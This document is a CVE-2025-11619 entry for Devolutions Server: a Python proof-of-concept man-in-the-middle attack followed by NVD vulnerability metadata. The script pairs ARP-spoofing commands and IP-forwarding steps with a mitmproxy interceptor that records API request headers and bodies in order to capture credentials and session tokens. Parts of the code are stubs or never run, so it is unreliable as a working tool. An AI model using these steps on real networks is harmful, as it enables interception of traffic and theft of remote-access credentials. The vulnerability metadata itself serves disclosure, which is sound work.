CVE-2025-11619

# CVE-2025-11619 - Devolutions Server Improper Certificate Validation PoC # This PoC demonstrates a Man-in-the-Middle attack exploiting # the lack of proper TLS certificate validation when Devolutions Server # connects to its Gateway component. # Requirements: # - mitmproxy or similar TLS interception tool # - Network position to intercept traffic (ARP spoofing / DNS poisoning) # - Python 3.x #!/usr/bin/env python3 """ PoC for CVE-2025-11619: Improper Certificate Validation in Devolutions Server Demonstrates how a MitM attacker can intercept gateway connections because the server does not properly validate TLS certificates. """ from mitmproxy import http, ctx from mitmproxy.options import Options from mitmproxy.proxy.config import ProxyConfig import ssl import socket # Step 1: Generate a self-signed certificate for the gateway hostname # This simulates what an attacker would do to intercept TLS traffic def generate_fake_cert(): """ In a real attack scenario, the attacker would use a tool like mitmproxy, Bettercap, or Ettercap to dynamically generate certificates for the target hostname (gateway hostname). """ # mitmproxy's CA cert is automatically trusted by mitmproxy itself # The Devolutions Server client fails to validate properly, # so it accepts these forged certificates pass # Step 2: ARP Spoofing to get into MitM position def arp_spoof(target_ip, gateway_ip, interface="eth0"): """ Use arpspoof or scapy to poison ARP caches and intercept traffic. Example with scapy: from scapy.all import * send(ARP(op=2, pdst=target_ip, psrc=gateway_ip), iface=interface) """ print(f"[*] Performing ARP spoofing between {target_ip} and {gateway_ip}") print("[*] Attacker is now in Man-in-the-Middle position") # Step 3: Intercept and capture credentials from Devolutions Server traffic class DevolutionsInterceptor: def __init__(self): self.captured_data = [] def response(self, flow: http.HTTPFlow) -> None: """ Intercept HTTP/HTTPS responses from Devolutions Gateway. Extract sensitive data such as credentials, session tokens. """ # Look for Devolutions Server API endpoints if "/api/" in flow.request.pretty_url: print(f"[+] Intercepted Devolutions API call: {flow.request.pretty_url}") print(f"[+] Request headers: {dict(flow.request.headers)}") if flow.request.content: print(f"[+] Request body: {flow.request.content[:500]}") self.captured_data.append({ "url": flow.request.pretty_url, "method": flow.request.method, "headers": dict(flow.request.headers), "body": flow.request.content[:1000] if flow.request.content else None }) def running(self): print("[*] MitM proxy started - intercepting Devolutions Server traffic") print("[*] Waiting for Devolutions Server to connect to Gateway...") # Step 4: Main execution - run mitmproxy with Devolutions traffic interception if __name__ == "__main__": print("=" * 60) print("CVE-2025-11619 PoC - Devolutions Server MitM Attack") print("=" * 60) # Configure mitmproxy to intercept all HTTPS traffic # mitmproxy will present forged certificates that should be rejected # by proper validation, but Devolutions Server < 2025.3.3 accepts them options = Options( listen_host="0.0.0.0", listen_port=8080, ssl_insecure=True, # This is the attacker side - no cert validation needed mode=["transparent"] ) # Start ARP spoofing to redirect traffic through our proxy # arp_spoof("<devolutions_server_ip>", "<gateway_ip>") print("[*] Run: mitmdump -s devolutions_interceptor.py --mode transparent") print("[*] When Devolutions Server connects to Gateway, traffic will be intercepted") print("[*] Captured credentials and session data will be displayed above") # Usage: # 1. Set up ARP spoofing: arpspoof -i eth0 -t <target> <gateway> # 2. Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward # 3. Run mitmproxy: mitmdump -s this_script.py # 4. Wait for Devolutions Server to connect to Gateway # 5. Intercepted credentials will be captured # Impact: # - Credential theft (remote desktop passwords, SSH keys, database credentials) # - Session hijacking # - Data tampering (inject malicious responses) # - Full compromise of managed remote connections

{"cve": {"id": "CVE-2025-11619", "sourceIdentifier": "[email protected]", "published": "2025-10-15T20:15:34.287", "lastModified": "2025-12-03T14:51:58.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper certificate validation when connecting to gateways in Devolutions Server 2025.3.2 and earlier allows attackers in MitM position to intercept traffic."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.15.0", "matchCriteriaId": "E95B3F21-FCCF-430F-A006-2964EA8B10CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", "versionEndExcluding": "2025.3.3.0", "matchCriteriaId": "6EFFA6AC-7EC1-42C1-B3AB-7E953AA46D08"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0014/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}